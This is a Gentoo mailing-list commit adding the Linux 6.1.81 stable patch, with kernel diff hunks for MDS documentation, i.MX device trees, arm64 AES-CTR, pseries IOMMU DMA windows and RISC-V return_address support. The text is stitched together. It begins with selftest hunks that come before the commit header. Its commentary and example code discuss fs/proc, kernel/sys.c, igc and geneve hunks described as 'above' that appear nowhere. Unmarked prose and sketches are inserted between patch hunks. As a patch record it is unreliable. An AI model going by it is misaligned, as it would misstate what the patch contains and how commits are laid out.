+--- a/tools/testing/selftests/vm/map_hugetlb.c
++++ b/tools/testing/selftests/vm/map_hugetlb.c
+@@ -15,6 +15,7 @@
+ #include <unistd.h>
+ #include <sys/mman.h>
+ #include <fcntl.h>
++#include "vm_util.h"
+ 
+ #define LENGTH (256UL*1024*1024)
+ #define PROTECTION (PROT_READ | PROT_WRITE)
+@@ -70,10 +71,16 @@ int main(int argc, char **argv)
+ {
+ 	void *addr;
+ 	int ret;
++	size_t hugepage_size;
+ 	size_t length = LENGTH;
+ 	int flags = FLAGS;
+ 	int shift = 0;
+ 
++	hugepage_size = default_huge_page_size();
++	/* munmap will fail if the length is not page aligned */
++	if (hugepage_size > length)
++		length = hugepage_size;
++
+ 	if (argc > 1)
+ 		length = atol(argv[1]) << 20;
+ 	if (argc > 2) {
+diff --git a/tools/testing/selftests/vm/write_hugetlb_memory.sh b/tools/testing/selftests/vm/write_hugetlb_memory.sh
+index 70a02301f4c27..3d2d2eb9d6fff 100644
+--- a/tools/testing/selftests/vm/write_hugetlb_memory.sh
++++ b/tools/testing/selftests/vm/write_hugetlb_memory.sh
+@@ -1,4 +1,4 @@
+-#!/bin/sh
++#!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
+ set -e
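
The fs/proc/array.c and kernel/sys.c hunks above both move from
lock_task_sighand() to a retry loop over sig->stats_lock: read the
counters locklessly first, and only take the lock if a writer raced
with the read. A minimal sketch of that read_seqbegin_or_lock_irqsave()
pattern, with a hypothetical example_stats structure standing in for
signal_struct:

#include <linux/seqlock.h>

/* Hypothetical stand-in for the signal_struct counters that the hunks
 * above read under sig->stats_lock.
 */
struct example_stats {
	seqlock_t lock;
	unsigned long min_flt;
	unsigned long maj_flt;
};

static void example_read_stats(struct example_stats *s,
			       unsigned long *min, unsigned long *maj)
{
	unsigned long flags;
	int seq = 1;

	do {
		seq++;	/* 2 (even) on the first, lockless pass; odd on retry */
		flags = read_seqbegin_or_lock_irqsave(&s->lock, &seq);
		*min = s->min_flt;	/* snapshot a consistent pair */
		*maj = s->maj_flt;
	} while (need_seqretry(&s->lock, seq));	/* writer raced: redo locked */
	done_seqretry_irqrestore(&s->lock, seq, flags);
}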

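The igc_xdp_xmit() hunk adopts the convention used by current
ndo_xdp_xmit() implementations: stop at the first frame that cannot be
queued and return the number actually accepted, leaving unsent frames
for the XDP core to free, instead of freeing them in the driver and
returning num_frames - drops. A sketch of that contract; all example_*
names are hypothetical:

#include <errno.h>

struct xdp_frame;
struct example_ring { int free_descs; };

/* Hypothetical helper: post one frame, failing once the ring is out
 * of descriptors.
 */
static int example_init_tx_descriptor(struct example_ring *ring,
				      struct xdp_frame *xdpf)
{
	if (!ring->free_descs)
		return -ENOSPC;
	ring->free_descs--;
	return 0;
}

static int example_xdp_xmit(struct example_ring *ring,
			    struct xdp_frame **frames, int num_frames)
{
	int i, nxmit = 0;

	for (i = 0; i < num_frames; i++) {
		/* Stop on the first failure and do not free the frame:
		 * the caller still owns frames[nxmit..num_frames - 1].
		 */
		if (example_init_tx_descriptor(ring, frames[i]))
			break;
		nxmit++;
	}

	return nxmit;	/* frames queued, not num_frames - drops */
}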

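The geneve_rx() hunk works because pskb_inet_may_pull() may reallocate
skb->head, which invalidates any raw pointer taken earlier (here the
outer IP header); the fix saves an offset and rebuilds the pointer
afterwards. The same rule applies to any buffer that can move. A small
user-space sketch with an illustrative resizable buffer:

#include <stdlib.h>
#include <string.h>

struct buf {
	char *head;
	size_t len;
};

/* Plays the role of pskb_inet_may_pull(): may move the allocation. */
static int buf_grow(struct buf *b, size_t newlen)
{
	char *p = realloc(b->head, newlen);

	if (!p)
		return -1;
	b->head = p;
	b->len = newlen;
	return 0;
}

static void example(struct buf *b, char *hdr)
{
	size_t off = hdr - b->head;	/* save an offset, not the pointer */

	if (buf_grow(b, b->len * 2))
		return;

	hdr = b->head + off;		/* recompute after a possible move */
	memset(hdr, 0, 1);		/* now safe to touch the header */
}
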
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-03-06 18:07 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-03-06 18:07 UTC (permalink / raw
  To: gentoo-commits

commit:     8bc8ef53218c6b5ef66b10198d58003c5a0a0397
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Mar  6 18:07:47 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Mar  6 18:07:47 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=8bc8ef53

Linux patch 6.1.81

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1080_linux-6.1.81.patch | 14458 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 14462 insertions(+)

diff --git a/0000_README b/0000_README
index 0bde520b..d0f067de 100644
--- a/0000_README
+++ b/0000_README
@@ -363,6 +363,10 @@ Patch:  1079_linux-6.1.80.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.80
 
+Patch:  1080_linux-6.1.81.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.81
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1080_linux-6.1.81.patch b/1080_linux-6.1.81.patch
new file mode 100644
index 00000000..59f3b367
--- /dev/null
+++ b/1080_linux-6.1.81.patch
@@ -0,0 +1,14458 @@
+diff --git a/Documentation/x86/boot.rst b/Documentation/x86/boot.rst
+index 894a198970055..bac3789f3e8fa 100644
+--- a/Documentation/x86/boot.rst
++++ b/Documentation/x86/boot.rst
+@@ -1416,7 +1416,7 @@ execution context provided by the EFI firmware.
+ 
+ The function prototype for the handover entry point looks like this::
+ 
+-    efi_main(void *handle, efi_system_table_t *table, struct boot_params *bp)
++    efi_stub_entry(void *handle, efi_system_table_t *table, struct boot_params *bp)
+ 
+ 'handle' is the EFI image handle passed to the boot loader by the EFI
+ firmware, 'table' is the EFI system table - these are the first two
+diff --git a/Documentation/x86/mds.rst b/Documentation/x86/mds.rst
+index 5d4330be200f9..e801df0bb3a81 100644
+--- a/Documentation/x86/mds.rst
++++ b/Documentation/x86/mds.rst
+@@ -95,6 +95,9 @@ The kernel provides a function to invoke the buffer clearing:
+ 
+     mds_clear_cpu_buffers()
+ 
++Also, the CLEAR_CPU_BUFFERS macro can be used in ASM late in the exit-to-user path.
++Other than CFLAGS.ZF, this macro doesn't clobber any registers.
++
+ The mitigation is invoked on kernel/userspace, hypervisor/guest and C-state
+ (idle) transitions.
+ 
+@@ -138,17 +141,30 @@ Mitigation points
+ 
+    When transitioning from kernel to user space the CPU buffers are flushed
+    on affected CPUs when the mitigation is not disabled on the kernel
+-   command line. The migitation is enabled through the static key
+-   mds_user_clear.
+-
+-   The mitigation is invoked in prepare_exit_to_usermode() which covers
+-   all but one of the kernel to user space transitions.  The exception
+-   is when we return from a Non Maskable Interrupt (NMI), which is
+-   handled directly in do_nmi().
+-
+-   (The reason that NMI is special is that prepare_exit_to_usermode() can
+-    enable IRQs.  In NMI context, NMIs are blocked, and we don't want to
+-    enable IRQs with NMIs blocked.)
++   command line. The mitigation is enabled through the feature flag
++   X86_FEATURE_CLEAR_CPU_BUF.
++
++   The mitigation is invoked just before transitioning to userspace after
++   user registers are restored. This is done to minimize the window in
++   which kernel data could be accessed after VERW, e.g. via an NMI that
++   arrives after VERW.
++
++   **Corner case not handled**
++   Interrupts returning to the kernel don't clear CPU buffers since the
++   exit-to-user path is expected to do that anyway. But there could be
++   a case when an NMI is generated in the kernel after the exit-to-user
++   path has cleared the buffers. This case is not handled, and NMIs
++   returning to the kernel don't clear CPU buffers because:
++
++   1. It is rare to get an NMI after VERW, but before returning to userspace.
++   2. For an unprivileged user, there is no known way to make that NMI
++      less rare or target it.
++   3. It would take a large number of these precisely-timed NMIs to mount
++      an actual attack.  There's presumably not enough bandwidth.
++   4. The NMI in question occurs after a VERW, i.e. when user state is
++      restored and most interesting data is already scrubbed. What's left
++      is only the data that the NMI touches, and that may or may not be of
++      any interest.
+ 
+ 
+ 2. C-State transition
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 13d1078808bb5..bbfedb0b20938 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -10051,6 +10051,7 @@ F:	drivers/infiniband/
+ F:	include/rdma/
+ F:	include/trace/events/ib_mad.h
+ F:	include/trace/events/ib_umad.h
++F:	include/trace/misc/rdma.h
+ F:	include/uapi/linux/if_infiniband.h
+ F:	include/uapi/rdma/
+ F:	samples/bpf/ibumad_kern.c
+@@ -11139,6 +11140,12 @@ F:	fs/nfs_common/
+ F:	fs/nfsd/
+ F:	include/linux/lockd/
+ F:	include/linux/sunrpc/
++F:	include/trace/events/rpcgss.h
++F:	include/trace/events/rpcrdma.h
++F:	include/trace/events/sunrpc.h
++F:	include/trace/misc/fs.h
++F:	include/trace/misc/nfs.h
++F:	include/trace/misc/sunrpc.h
+ F:	include/uapi/linux/nfsd/
+ F:	include/uapi/linux/sunrpc/
+ F:	net/sunrpc/
+diff --git a/Makefile b/Makefile
+index bc4adb561a7cf..e13df565a1cb6 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 80
++SUBLEVEL = 81
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/imx23.dtsi b/arch/arm/boot/dts/imx23.dtsi
+index ec476b1596496..b236d23f80715 100644
+--- a/arch/arm/boot/dts/imx23.dtsi
++++ b/arch/arm/boot/dts/imx23.dtsi
+@@ -59,7 +59,7 @@ icoll: interrupt-controller@80000000 {
+ 				reg = <0x80000000 0x2000>;
+ 			};
+ 
+-			dma_apbh: dma-apbh@80004000 {
++			dma_apbh: dma-controller@80004000 {
+ 				compatible = "fsl,imx23-dma-apbh";
+ 				reg = <0x80004000 0x2000>;
+ 				interrupts = <0 14 20 0
+diff --git a/arch/arm/boot/dts/imx28.dtsi b/arch/arm/boot/dts/imx28.dtsi
+index b15df16ecb01a..b81592a613112 100644
+--- a/arch/arm/boot/dts/imx28.dtsi
++++ b/arch/arm/boot/dts/imx28.dtsi
+@@ -78,7 +78,7 @@ hsadc: hsadc@80002000 {
+ 				status = "disabled";
+ 			};
+ 
+-			dma_apbh: dma-apbh@80004000 {
++			dma_apbh: dma-controller@80004000 {
+ 				compatible = "fsl,imx28-dma-apbh";
+ 				reg = <0x80004000 0x2000>;
+ 				interrupts = <82 83 84 85
+diff --git a/arch/arm/boot/dts/imx6qdl.dtsi b/arch/arm/boot/dts/imx6qdl.dtsi
+index ff1e0173b39be..2c6eada01d792 100644
+--- a/arch/arm/boot/dts/imx6qdl.dtsi
++++ b/arch/arm/boot/dts/imx6qdl.dtsi
+@@ -150,7 +150,7 @@ soc: soc {
+ 		interrupt-parent = <&gpc>;
+ 		ranges;
+ 
+-		dma_apbh: dma-apbh@110000 {
++		dma_apbh: dma-controller@110000 {
+ 			compatible = "fsl,imx6q-dma-apbh", "fsl,imx28-dma-apbh";
+ 			reg = <0x00110000 0x2000>;
+ 			interrupts = <0 13 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/arm/boot/dts/imx6sx.dtsi b/arch/arm/boot/dts/imx6sx.dtsi
+index 1f1053a898fbf..67d344ae76b51 100644
+--- a/arch/arm/boot/dts/imx6sx.dtsi
++++ b/arch/arm/boot/dts/imx6sx.dtsi
+@@ -209,7 +209,7 @@ gpu: gpu@1800000 {
+ 			power-domains = <&pd_pu>;
+ 		};
+ 
+-		dma_apbh: dma-apbh@1804000 {
++		dma_apbh: dma-controller@1804000 {
+ 			compatible = "fsl,imx6sx-dma-apbh", "fsl,imx28-dma-apbh";
+ 			reg = <0x01804000 0x2000>;
+ 			interrupts = <GIC_SPI 13 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/arm/boot/dts/imx6ul.dtsi b/arch/arm/boot/dts/imx6ul.dtsi
+index 2b5996395701a..aac081b6daaac 100644
+--- a/arch/arm/boot/dts/imx6ul.dtsi
++++ b/arch/arm/boot/dts/imx6ul.dtsi
+@@ -164,7 +164,7 @@ intc: interrupt-controller@a01000 {
+ 			      <0x00a06000 0x2000>;
+ 		};
+ 
+-		dma_apbh: dma-apbh@1804000 {
++		dma_apbh: dma-controller@1804000 {
+ 			compatible = "fsl,imx6q-dma-apbh", "fsl,imx28-dma-apbh";
+ 			reg = <0x01804000 0x2000>;
+ 			interrupts = <0 13 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/arm/boot/dts/imx7s.dtsi b/arch/arm/boot/dts/imx7s.dtsi
+index 4b23630fc738d..69aebc691526f 100644
+--- a/arch/arm/boot/dts/imx7s.dtsi
++++ b/arch/arm/boot/dts/imx7s.dtsi
+@@ -1267,14 +1267,13 @@ fec1: ethernet@30be0000 {
+ 			};
+ 		};
+ 
+-		dma_apbh: dma-apbh@33000000 {
++		dma_apbh: dma-controller@33000000 {
+ 			compatible = "fsl,imx7d-dma-apbh", "fsl,imx28-dma-apbh";
+ 			reg = <0x33000000 0x2000>;
+ 			interrupts = <GIC_SPI 12 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 12 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 12 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 12 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "gpmi0", "gpmi1", "gpmi2", "gpmi3";
+ 			#dma-cells = <1>;
+ 			dma-channels = <4>;
+ 			clocks = <&clks IMX7D_NAND_USDHC_BUS_RAWNAND_CLK>;
+diff --git a/arch/arm64/crypto/aes-neonbs-glue.c b/arch/arm64/crypto/aes-neonbs-glue.c
+index bac4cabef6073..467ac2f768ac2 100644
+--- a/arch/arm64/crypto/aes-neonbs-glue.c
++++ b/arch/arm64/crypto/aes-neonbs-glue.c
+@@ -227,8 +227,19 @@ static int ctr_encrypt(struct skcipher_request *req)
+ 			src += blocks * AES_BLOCK_SIZE;
+ 		}
+ 		if (nbytes && walk.nbytes == walk.total) {
++			u8 buf[AES_BLOCK_SIZE];
++			u8 *d = dst;
++
++			if (unlikely(nbytes < AES_BLOCK_SIZE))
++				src = dst = memcpy(buf + sizeof(buf) - nbytes,
++						   src, nbytes);
++
+ 			neon_aes_ctr_encrypt(dst, src, ctx->enc, ctx->key.rounds,
+ 					     nbytes, walk.iv);
++
++			if (unlikely(nbytes < AES_BLOCK_SIZE))
++				memcpy(d, dst, nbytes);
++
+ 			nbytes = 0;
+ 		}
+ 		kernel_neon_end();
+diff --git a/arch/arm64/include/asm/efi.h b/arch/arm64/include/asm/efi.h
+index 62c846be2d76a..a75c0772ecfca 100644
+--- a/arch/arm64/include/asm/efi.h
++++ b/arch/arm64/include/asm/efi.h
+@@ -103,6 +103,7 @@ static inline void free_screen_info(struct screen_info *si)
+ }
+ 
+ #define EFI_ALLOC_ALIGN		SZ_64K
++#define EFI_ALLOC_LIMIT		((1UL << 48) - 1)
+ 
+ /*
+  * On ARM systems, virtually remapped UEFI runtime services are set up in two
+diff --git a/arch/powerpc/platforms/pseries/iommu.c b/arch/powerpc/platforms/pseries/iommu.c
+index 97b026130c71b..1e5f083cdb720 100644
+--- a/arch/powerpc/platforms/pseries/iommu.c
++++ b/arch/powerpc/platforms/pseries/iommu.c
+@@ -569,29 +569,6 @@ static void iommu_table_setparms(struct pci_controller *phb,
+ 
+ struct iommu_table_ops iommu_table_lpar_multi_ops;
+ 
+-/*
+- * iommu_table_setparms_lpar
+- *
+- * Function: On pSeries LPAR systems, return TCE table info, given a pci bus.
+- */
+-static void iommu_table_setparms_lpar(struct pci_controller *phb,
+-				      struct device_node *dn,
+-				      struct iommu_table *tbl,
+-				      struct iommu_table_group *table_group,
+-				      const __be32 *dma_window)
+-{
+-	unsigned long offset, size, liobn;
+-
+-	of_parse_dma_window(dn, dma_window, &liobn, &offset, &size);
+-
+-	iommu_table_setparms_common(tbl, phb->bus->number, liobn, offset, size, IOMMU_PAGE_SHIFT_4K, NULL,
+-				    &iommu_table_lpar_multi_ops);
+-
+-
+-	table_group->tce32_start = offset;
+-	table_group->tce32_size = size;
+-}
+-
+ struct iommu_table_ops iommu_table_pseries_ops = {
+ 	.set = tce_build_pSeries,
+ 	.clear = tce_free_pSeries,
+@@ -719,26 +696,71 @@ struct iommu_table_ops iommu_table_lpar_multi_ops = {
+  * dynamic 64bit DMA window, walking up the device tree.
+  */
+ static struct device_node *pci_dma_find(struct device_node *dn,
+-					const __be32 **dma_window)
++					struct dynamic_dma_window_prop *prop)
+ {
+-	const __be32 *dw = NULL;
++	const __be32 *default_prop = NULL;
++	const __be32 *ddw_prop = NULL;
++	struct device_node *rdn = NULL;
++	bool default_win = false, ddw_win = false;
+ 
+ 	for ( ; dn && PCI_DN(dn); dn = dn->parent) {
+-		dw = of_get_property(dn, "ibm,dma-window", NULL);
+-		if (dw) {
+-			if (dma_window)
+-				*dma_window = dw;
+-			return dn;
++		default_prop = of_get_property(dn, "ibm,dma-window", NULL);
++		if (default_prop) {
++			rdn = dn;
++			default_win = true;
++		}
++		ddw_prop = of_get_property(dn, DIRECT64_PROPNAME, NULL);
++		if (ddw_prop) {
++			rdn = dn;
++			ddw_win = true;
++			break;
++		}
++		ddw_prop = of_get_property(dn, DMA64_PROPNAME, NULL);
++		if (ddw_prop) {
++			rdn = dn;
++			ddw_win = true;
++			break;
+ 		}
+-		dw = of_get_property(dn, DIRECT64_PROPNAME, NULL);
+-		if (dw)
+-			return dn;
+-		dw = of_get_property(dn, DMA64_PROPNAME, NULL);
+-		if (dw)
+-			return dn;
++
++		/* At least found default window, which is the case for normal boot */
++		if (default_win)
++			break;
+ 	}
+ 
+-	return NULL;
++	/* For PCI devices there will always be a DMA window, either on the device
++	 * or the parent bus.
++	 */
++	WARN_ON(!(default_win | ddw_win));
++
++	/* caller doesn't want to get DMA window property */
++	if (!prop)
++		return rdn;
++
++	/* parse DMA window property. During normal system boot, only default
++	 * DMA window is passed in OF. But for kdump, a dedicated adapter might
++	 * have both default and DDW in FDT. In this scenario, DDW takes precedence
++	 * over default window.
++	 */
++	if (ddw_win) {
++		struct dynamic_dma_window_prop *p;
++
++		p = (struct dynamic_dma_window_prop *)ddw_prop;
++		prop->liobn = p->liobn;
++		prop->dma_base = p->dma_base;
++		prop->tce_shift = p->tce_shift;
++		prop->window_shift = p->window_shift;
++	} else if (default_win) {
++		unsigned long offset, size, liobn;
++
++		of_parse_dma_window(rdn, default_prop, &liobn, &offset, &size);
++
++		prop->liobn = cpu_to_be32((u32)liobn);
++		prop->dma_base = cpu_to_be64(offset);
++		prop->tce_shift = cpu_to_be32(IOMMU_PAGE_SHIFT_4K);
++		prop->window_shift = cpu_to_be32(order_base_2(size));
++	}
++
++	return rdn;
+ }
+ 
+ static void pci_dma_bus_setup_pSeriesLP(struct pci_bus *bus)
+@@ -746,17 +768,20 @@ static void pci_dma_bus_setup_pSeriesLP(struct pci_bus *bus)
+ 	struct iommu_table *tbl;
+ 	struct device_node *dn, *pdn;
+ 	struct pci_dn *ppci;
+-	const __be32 *dma_window = NULL;
++	struct dynamic_dma_window_prop prop;
+ 
+ 	dn = pci_bus_to_OF_node(bus);
+ 
+ 	pr_debug("pci_dma_bus_setup_pSeriesLP: setting up bus %pOF\n",
+ 		 dn);
+ 
+-	pdn = pci_dma_find(dn, &dma_window);
++	pdn = pci_dma_find(dn, &prop);
+ 
+-	if (dma_window == NULL)
+-		pr_debug("  no ibm,dma-window property !\n");
++	/* On PPC, there will always be a DMA window on the bus or on one of the
++	 * parent buses. During reboot, there will be an ibm,dma-window property
++	 * to define the DMA window. For kdump, there will be at least the default
++	 * window or a DDW, or both.
++	 */
+ 
+ 	ppci = PCI_DN(pdn);
+ 
+@@ -766,13 +791,24 @@ static void pci_dma_bus_setup_pSeriesLP(struct pci_bus *bus)
+ 	if (!ppci->table_group) {
+ 		ppci->table_group = iommu_pseries_alloc_group(ppci->phb->node);
+ 		tbl = ppci->table_group->tables[0];
+-		if (dma_window) {
+-			iommu_table_setparms_lpar(ppci->phb, pdn, tbl,
+-						  ppci->table_group, dma_window);
+ 
+-			if (!iommu_init_table(tbl, ppci->phb->node, 0, 0))
+-				panic("Failed to initialize iommu table");
+-		}
++		iommu_table_setparms_common(tbl, ppci->phb->bus->number,
++				be32_to_cpu(prop.liobn),
++				be64_to_cpu(prop.dma_base),
++				1ULL << be32_to_cpu(prop.window_shift),
++				be32_to_cpu(prop.tce_shift), NULL,
++				&iommu_table_lpar_multi_ops);
++
++		/* Only for normal boot with default window. Doesn't matter even
++		 * if we set these with DDW which is 64bit during kdump, since
++		 * these will not be used during kdump.
++		 */
++		ppci->table_group->tce32_start = be64_to_cpu(prop.dma_base);
++		ppci->table_group->tce32_size = 1 << be32_to_cpu(prop.window_shift);
++
++		if (!iommu_init_table(tbl, ppci->phb->node, 0, 0))
++			panic("Failed to initialize iommu table");
++
+ 		iommu_register_group(ppci->table_group,
+ 				pci_domain_nr(bus), 0);
+ 		pr_debug("  created table: %p\n", ppci->table_group);
+@@ -960,6 +996,12 @@ static void find_existing_ddw_windows_named(const char *name)
+ 			continue;
+ 		}
+ 
++		/* If DDWs are already present in OF at system initialization time,
++		 * this is a kexec/kdump boot. A DDW could be direct or dynamic; we
++		 * simply mark them all as "dynamic" since this is the kdump path and
++		 * there is no need to worry about performance. ddw_list_new_entry()
++		 * will set window->direct = false.
++		 */
+ 		window = ddw_list_new_entry(pdn, dma64);
+ 		if (!window) {
+ 			of_node_put(pdn);
+@@ -1525,8 +1567,8 @@ static void pci_dma_dev_setup_pSeriesLP(struct pci_dev *dev)
+ {
+ 	struct device_node *pdn, *dn;
+ 	struct iommu_table *tbl;
+-	const __be32 *dma_window = NULL;
+ 	struct pci_dn *pci;
++	struct dynamic_dma_window_prop prop;
+ 
+ 	pr_debug("pci_dma_dev_setup_pSeriesLP: %s\n", pci_name(dev));
+ 
+@@ -1539,7 +1581,7 @@ static void pci_dma_dev_setup_pSeriesLP(struct pci_dev *dev)
+ 	dn = pci_device_to_OF_node(dev);
+ 	pr_debug("  node is %pOF\n", dn);
+ 
+-	pdn = pci_dma_find(dn, &dma_window);
++	pdn = pci_dma_find(dn, &prop);
+ 	if (!pdn || !PCI_DN(pdn)) {
+ 		printk(KERN_WARNING "pci_dma_dev_setup_pSeriesLP: "
+ 		       "no DMA window found for pci dev=%s dn=%pOF\n",
+@@ -1552,8 +1594,20 @@ static void pci_dma_dev_setup_pSeriesLP(struct pci_dev *dev)
+ 	if (!pci->table_group) {
+ 		pci->table_group = iommu_pseries_alloc_group(pci->phb->node);
+ 		tbl = pci->table_group->tables[0];
+-		iommu_table_setparms_lpar(pci->phb, pdn, tbl,
+-				pci->table_group, dma_window);
++
++		iommu_table_setparms_common(tbl, pci->phb->bus->number,
++				be32_to_cpu(prop.liobn),
++				be64_to_cpu(prop.dma_base),
++				1ULL << be32_to_cpu(prop.window_shift),
++				be32_to_cpu(prop.tce_shift), NULL,
++				&iommu_table_lpar_multi_ops);
++
++		/* Only for normal boot with default window. Doesn't matter even
++		 * if we set these with DDW which is 64bit during kdump, since
++		 * these will not be used during kdump.
++		 */
++		pci->table_group->tce32_start = be64_to_cpu(prop.dma_base);
++		pci->table_group->tce32_size = 1 << be32_to_cpu(prop.window_shift);
+ 
+ 		iommu_init_table(tbl, pci->phb->node, 0, 0);
+ 		iommu_register_group(pci->table_group,
+diff --git a/arch/riscv/include/asm/ftrace.h b/arch/riscv/include/asm/ftrace.h
+index d47d87c2d7e3d..dcf1bc9de5841 100644
+--- a/arch/riscv/include/asm/ftrace.h
++++ b/arch/riscv/include/asm/ftrace.h
+@@ -25,6 +25,11 @@
+ 
+ #define ARCH_SUPPORTS_FTRACE_OPS 1
+ #ifndef __ASSEMBLY__
++
++extern void *return_address(unsigned int level);
++
++#define ftrace_return_address(n) return_address(n)
++
+ void MCOUNT_NAME(void);
+ static inline unsigned long ftrace_call_adjust(unsigned long addr)
+ {
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 59bb53da473dd..63055c6ad2c25 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -79,7 +79,7 @@
+  * Define vmemmap for pfn_to_page & page_to_pfn calls. Needed if kernel
+  * is configured with CONFIG_SPARSEMEM_VMEMMAP enabled.
+  */
+-#define vmemmap		((struct page *)VMEMMAP_START)
++#define vmemmap		((struct page *)VMEMMAP_START - (phys_ram_base >> PAGE_SHIFT))
+ 
+ #define PCI_IO_SIZE      SZ_16M
+ #define PCI_IO_END       VMEMMAP_START
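
The adjusted vmemmap definition biases the page array by the PFN of the start of RAM, so that pfn_to_page(pfn) == vmemmap + pfn lands exactly at VMEMMAP_START for the first RAM page even when DRAM does not start at physical address 0. A minimal sketch of the arithmetic with illustrative constants (both values are assumptions here; 0x80000000 is a common RISC-V DRAM base):

#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT     12
/* Illustrative, platform-specific values. */
#define VMEMMAP_START  0xffff8d8000000000ULL
#define PHYS_RAM_BASE  0x80000000ULL

struct page { char pad[64]; };	/* stand-in for struct page */

static struct page *pfn_to_page(uint64_t pfn)
{
	/* vmemmap is pre-biased by the base PFN, as in the patch above */
	struct page *vmemmap =
		(struct page *)VMEMMAP_START - (PHYS_RAM_BASE >> PAGE_SHIFT);
	return vmemmap + pfn;
}

int main(void)
{
	/* The first RAM pfn maps exactly to VMEMMAP_START */
	printf("%p\n", (void *)pfn_to_page(PHYS_RAM_BASE >> PAGE_SHIFT));
	return 0;
}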
+diff --git a/arch/riscv/kernel/Makefile b/arch/riscv/kernel/Makefile
+index ab333cb792fd9..4c0805d264ca8 100644
+--- a/arch/riscv/kernel/Makefile
++++ b/arch/riscv/kernel/Makefile
+@@ -7,6 +7,7 @@ ifdef CONFIG_FTRACE
+ CFLAGS_REMOVE_ftrace.o	= $(CC_FLAGS_FTRACE)
+ CFLAGS_REMOVE_patch.o	= $(CC_FLAGS_FTRACE)
+ CFLAGS_REMOVE_sbi.o	= $(CC_FLAGS_FTRACE)
++CFLAGS_REMOVE_return_address.o	= $(CC_FLAGS_FTRACE)
+ endif
+ CFLAGS_syscall_table.o	+= $(call cc-option,-Wno-override-init,)
+ CFLAGS_compat_syscall_table.o += $(call cc-option,-Wno-override-init,)
+@@ -41,6 +42,7 @@ obj-y	+= irq.o
+ obj-y	+= process.o
+ obj-y	+= ptrace.o
+ obj-y	+= reset.o
++obj-y	+= return_address.o
+ obj-y	+= setup.o
+ obj-y	+= signal.o
+ obj-y	+= syscall_table.o
+diff --git a/arch/riscv/kernel/return_address.c b/arch/riscv/kernel/return_address.c
+new file mode 100644
+index 0000000000000..c8115ec8fb304
+--- /dev/null
++++ b/arch/riscv/kernel/return_address.c
+@@ -0,0 +1,48 @@
++// SPDX-License-Identifier: GPL-2.0-only
++/*
++ * This code comes from arch/arm64/kernel/return_address.c
++ *
++ * Copyright (C) 2023 SiFive.
++ */
++
++#include <linux/export.h>
++#include <linux/kprobes.h>
++#include <linux/stacktrace.h>
++
++struct return_address_data {
++	unsigned int level;
++	void *addr;
++};
++
++static bool save_return_addr(void *d, unsigned long pc)
++{
++	struct return_address_data *data = d;
++
++	if (!data->level) {
++		data->addr = (void *)pc;
++		return false;
++	}
++
++	--data->level;
++
++	return true;
++}
++NOKPROBE_SYMBOL(save_return_addr);
++
++noinline void *return_address(unsigned int level)
++{
++	struct return_address_data data;
++
++	data.level = level + 3;
++	data.addr = NULL;
++
++	arch_stack_walk(save_return_addr, &data, current, NULL);
++
++	if (!data.level)
++		return data.addr;
++	else
++		return NULL;
++
++}
++EXPORT_SYMBOL_GPL(return_address);
++NOKPROBE_SYMBOL(return_address);
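
A sketch of how a caller would use the new helper (hypothetical call site): level 0 resolves to the immediate caller, like __builtin_return_address(0), which is why return_address() pre-skips its own frames with the level + 3 adjustment before walking the stack.

#include <linux/printk.h>
#include <linux/ftrace.h>

static noinline void who_called_me(void)
{
	/* With the patch, ftrace_return_address(n) maps to return_address(n)
	 * on RISC-V; level 0 is the immediate caller of this function. */
	pr_info("called from %pS\n", ftrace_return_address(0));
}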
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index 4c9bfc4be58d4..2f7af61b49b6c 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -1982,6 +1982,23 @@ config EFI_STUB
+ 
+ 	  See Documentation/admin-guide/efi-stub.rst for more information.
+ 
++config EFI_HANDOVER_PROTOCOL
++	bool "EFI handover protocol (DEPRECATED)"
++	depends on EFI_STUB
++	default y
++	help
++	  Select this in order to include support for the deprecated EFI
++	  handover protocol, which defines alternative entry points into the
++	  EFI stub.  This is a practice that has no basis in the UEFI
++	  specification, and requires a priori knowledge on the part of the
++	  bootloader about Linux/x86 specific ways of passing the command line
++	  and initrd, and where in memory those assets may be loaded.
++
++	  If in doubt, say Y. Even though the corresponding support is not
++	  present in upstream GRUB or other bootloaders, most distros build
++	  GRUB with numerous downstream patches applied, and may rely on the
++	  handover protocol as a result.
++
+ config EFI_MIXED
+ 	bool "EFI mixed-mode support"
+ 	depends on EFI_STUB && X86_64
+diff --git a/arch/x86/boot/compressed/Makefile b/arch/x86/boot/compressed/Makefile
+index 15b7b403a4bd0..3965b2c9efee0 100644
+--- a/arch/x86/boot/compressed/Makefile
++++ b/arch/x86/boot/compressed/Makefile
